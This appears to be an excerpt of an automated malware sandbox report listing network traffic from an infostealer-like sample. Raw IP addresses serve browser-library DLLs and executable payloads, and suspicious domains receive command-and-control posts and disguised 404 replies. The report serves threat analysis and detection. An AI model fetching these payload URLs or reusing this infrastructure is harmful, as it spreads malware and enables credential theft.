Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231

Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: dbfhns.in
Source: global traffic	DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:32:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
